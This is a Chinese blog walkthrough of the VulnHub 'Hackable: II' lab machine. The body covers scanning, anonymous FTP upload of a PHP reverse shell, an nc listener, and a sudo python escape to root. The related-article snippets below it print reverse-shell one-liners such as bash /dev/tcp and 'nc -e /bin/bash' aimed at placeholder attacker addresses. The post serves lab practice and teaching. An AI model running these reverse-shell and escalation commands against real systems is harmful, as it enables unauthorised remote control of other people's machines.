VulnHub_HACKABLE: II靶机

最新推荐文章于 2024-04-21 12:44:28 发布
最新推荐文章于 2024-04-21 12:44:28 发布
阅读量283 收藏 1
点赞数
分类专栏: 靶机 文章标签: 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39368364/article/details/119876134
版权

文章目录

靶机介绍

下载地址:https://www.vulnhub.com/entry/hackable-ii,711/
难度:简单

渗透过程

ip地址扫描

我们通过设置桥接模式,能够用arp-scan搜索同一局域网中的活跃主机。这里,我们得到靶机的ip是192.168.1.106。

arp-scan -l

在这里插入图片描述

端口扫描

对靶机进行端口扫描,可以看到这里有三个端口:21,22,80。

nmap -A -T4 -p 1-65535 192.168.1.106

在这里插入图片描述

访问ftp

上图可以看到,ftp是允许匿名登录的。输入以下的命令,直接在名字那里输入anonymous,密码那里回车就可以登录,并且可以上传文件。我们可以上传一个php反弹shell脚本。
在这里插入图片描述

制作php反弹shell脚本

首先ifconfig查看自己的ip,我的是192.168.1.105。使用kali自带的脚本php-reverse-shell.php。修改一下ip,然后记住这个端口。
在这里插入图片描述

上传脚本

首先连接ftp,然后lcd命令切换到本地的脚本的路径。然后put命令把脚本上传上去。ls可以看到脚本成功上传。

ftp 192.168.1.106
lcd /home/kali/Downloads/
put php-reverse-shell.php

在这里插入图片描述

nc监听脚本中记录的端口
nc -lnvp 1234
访问脚本网站

这里有个插曲,其实我最先访问的是http,然后http打开之后长这样:
在这里插入图片描述
就是一个默认页面,没有什么信息。然后我查看了一下源代码,这里有一个提示:
在这里插入图片描述
于是,我用dirb扫描了一下这个网站的目录。这里我们可以看到一个file目录,这个就是我们的ftp文件上传的目录。

dirb http://192.168.1.106 -w /usr/share/dirb/wordlists/big.txt

在这里插入图片描述
在这里插入图片描述

获取shell

那么我们现在找到了这个网站,直接点击脚本就可以在nc端获取到shell。
在这里插入图片描述
在这里插入图片描述

提权

首先获取一个tty。

python3 -c 'import pty;pty.spawn("/bin/bash")'
  1. 在home目录下有一个important.txt,打开之后它提示我们运行一个脚本。我们根据提示运行这个脚本。
    在这里插入图片描述
    在这里插入图片描述
    这里最后一行是一个shrek然后一串乱码。用MD5进行一个解密得到Shrek的密码。
    在这里插入图片描述
  2. 登录Shrek账号。
    在这里插入图片描述
    我们就有权限查看/home/shrek目录下的user.txt文档,这个文档打开之后是一个企鹅以及一个领英的网址链接。
    在这里插入图片描述
  3. 再找找有没有别的线索。
    执行sudo -l,看到一个提示。这个命令是可以列出用户能以sudo方式执行的所有命令。这里提示用python3.5。
    在这里插入图片描述
    我们尝试一下让python返回一个bash。
sudo /usr/bin/python3.5 -c 'import os;os.system("/bin/sh")'

在这里插入图片描述
在这里插入图片描述
以上。

Yiru Zhao
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1082
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell 看这一篇就够了
最新发布
m0_69043895的博客
04-21 1213
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
PHP反弹shell
痴人说梦梦中人
09-26 7255
步骤详解: 前提: ①、PHPStudy开启相关服务。 ②、假设木马已上传至服务器且可以访问(即执行代码才能反弹shell)。 ③、攻击机器和受害服务器要处于同一网段。 1、划线为攻击机的IP+端口。 2、攻击机监听自身端口4444,即可获取执行shell。 <?php set_time_limit(0); $ip=$_POST['ip']; $port=$_POST['port'];...
php反弹shell脚本
a1_pha的博客
01-24 608
用msfvenom也可以生成反弹shell脚本,但有时候用不了。
【安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 5758
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
Hackable9:资料来源可入侵#9
04-28
Hackable》杂志#9的来源和文件 该存储库包含第九期的草图: WSmatrix44ok/ :电视模拟器的完整Arduino草图,其中.h包含使用FFMPEG从视频中提取的图像, script_images/go.sh :用于从包含用FFMPEG提取的图像...
Hackable8:可入侵的来源#8
05-11
Hackable》杂志#8的来源和文件该存储库包含Arduino草图以及第八期存在的其他文件(配置,PHP脚本等): AVR_C_arduino/ :Arduino IDE中“真实” C上的文章的C代码, chaudiere_Pi_Axelle_Ludovic/ :用于燃油...
Hackable7:可破解的来源#7
05-23
Hackable》杂志#7的来源和文件该存储库包含第七期存在的Arduino草图的来源: 使用的库是: DS1307RTC:通过Arduino IDE中的库管理器LiquidCrystal:默认安装时间和时间警报:通过Arduino IDE中的库管理器在...
Hackable6:来源可破解 #6
06-08
Hackable 杂志 #6 的来源和文件 该存储库包含第六期出现的 Arduino 草图的来源: 使用的库是:
signale:高度可配置的日志记录实用程序
01-29
信号 高度可配置的日志记录实用程序 描述 signale可入侵内核并可以对其进行配置,可用于记录日志,状态报告以及处理其他节点模块和应用程序的输出呈现过程。 请阅读以下文件:。 您现在可以通过支持开发过程。...
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
PHP代码实现反弹shell
E1even的博客
08-28 3628
靶机的时候遇到了,有时候反弹效果失败,下面这个PHP代码基本可以通杀 转载至链接:https://www.cnblogs.com/alex-13/p/3667790.html <?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists(
各种shell反弹方法
weixin_46626737的博客
05-16 1877
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
反弹shell以及常见的反弹Shell语句原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 470
什么是反弹shell?原词为reverse shell,含义如下 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。 其本质就是实现客户端与服务端的互换 反弹shell利用原因 初学时我们不禁有这样的疑问,为什么我们要用反弹shell呢?我们时候利用反弹shell呢?解释如下 为什么要用反弹shell 这里不以CTF举例,以相对更真实一点的渗透过程来举例,比如你作为攻击方,成功向目标处上传了木马文件,可以执行一些语句,我们想获取一个可以直接操作主机的虚拟终端,这个时
php命令执行反弹nc,详解NC反弹shell的几种方法
weixin_32187037的博客
04-04 1648
假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shellubuntu或者CentOS上面输入nc -lvp 7777 -e /bin/bashkali上输入nc ip 7777正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹s...
浅谈反弹shell
weixin_53284312的博客
01-12 2236
反弹shell
反弹shell的N种姿势
yyj1781572的博客
08-06 561
渗透测试过程中,经常会用到反弹shell,通过本实验的学习,了解反弹shell的概念和原理,掌握各种反弹shell的实现技术和方法。
php反弹教程,详解NC反弹shell的几种方法
weixin_39625586的博客
04-02 966
假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shellubuntu或者CentOS上面输入nc -lvp 7777 -e /bin/bashkali上输入nc ip 7777正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹s...
Writable folder /var/www/html/hackable/uploads/: No Writable file /var/www/html/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt: No
10-14
针对你提供的路径,/var/www/html/hackable/uploads/ 和 /var/www/html/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt 都没有写权限。这可能会导致一些问题,比如无法上传文件或记录日志。 为了解决这个问题,你...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值